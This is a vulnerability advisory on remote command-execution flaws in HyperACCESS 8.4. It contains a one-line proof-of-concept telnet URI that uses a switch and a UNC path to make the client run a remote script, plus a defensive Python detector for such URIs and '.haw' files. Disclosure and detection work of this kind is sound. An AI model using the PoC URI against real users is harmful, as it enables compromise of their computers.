Hilgraeve HyperAccess Multiple Remote Command Execution Vulnerabilities
BID:21594
Info
| Bugtraq ID: | 21594 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 14 2006 12:00AM |
| Updated: | Dec 15 2006 07:48PM |
| Credit: | Brett Moore <brett.moore@security-assessment.com> is credited with discovering this vulnerability. |
| Vulnerable: | Hilgraeve HyperACCESS 8.4 |
| Not Vulnerable: | |
Discussion
Hilgraeve HyperACCESS is prone to multiple remote command-execution vulnerabilities.
Attackers can exploit these issues to execute arbitrary application commands with the privileges of the affected application. A successful exploit could result in the compromise of affected computers.
Version 8.4 is vulnerable to these issues; prior versions may also be vulnerable.
Exploit / POC
To exploit these issues an attacker must entice a victim user to access a specially crafted URI or '.haw' file.
The following proof-of-concept telnet URI is available:
telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt
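A defender can search proxy logs, mail bodies or HTML for the shape of this URI: a telnet host and port followed by a slash-prefixed switch or a UNC path. The Python check below is an added example, not part of the original advisory; the function names, reason labels and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Remainder of the line after "telnet://", stopping at quotes or angle brackets.
TELNET_URI = re.compile(r"telnet://([^\"'<>\r\n]*)", re.IGNORECASE)
# A slash-prefixed single-letter switch as its own token, like "/r" in the PoC.
SWITCH = re.compile(r"(?:^|\s)/[A-Za-z](?=\s|$)")
# A UNC path such as \\SERVER\share\file
UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")


def inspect_telnet_uris(text):
    """Return (uri, reasons) for each telnet URI that carries extra arguments."""
    findings = []
    for line in text.splitlines():
        for match in TELNET_URI.finditer(line):
            # Percent-decode first: %20 -> space, %5C -> backslash.
            decoded = unquote(match.group(1))
            # Everything after the first space is not part of host[:port].
            _authority, _, tail = decoded.partition(" ")
            reasons = []
            if SWITCH.search(tail):
                reasons.append("switch-after-host")
            if UNC_PATH.search(tail):
                reasons.append("unc-path")
            if reasons:
                findings.append(("telnet://" + decoded.strip(), reasons))
    return findings


def is_haw_file(filename):
    """True for the '.haw' files the advisory names as the second vector."""
    return filename.strip().lower().endswith(".haw")


# Constructed sample input: documentation addresses and placeholder names.
SAMPLE = "\n".join([
    r'GET /page referer="telnet://192.0.2.10:23 # /r \\files.example\share\scriptfile.txt"',
    "link telnet://192.0.2.10:23%20%23%20/r%20%5C%5Cfiles.example%5Cshare%5Cs.txt",
    "see telnet://bbs.example:23 for the public board",
])

if __name__ == "__main__":
    for uri, reasons in inspect_telnet_uris(SAMPLE):
        print(reasons, uri)
```

Plain prose after a telnet link, as in the third sample line, is not flagged; only a switch token or a UNC path in the trailing text produces a finding.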
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- Hilgraeve Home Page (Hilgraeve)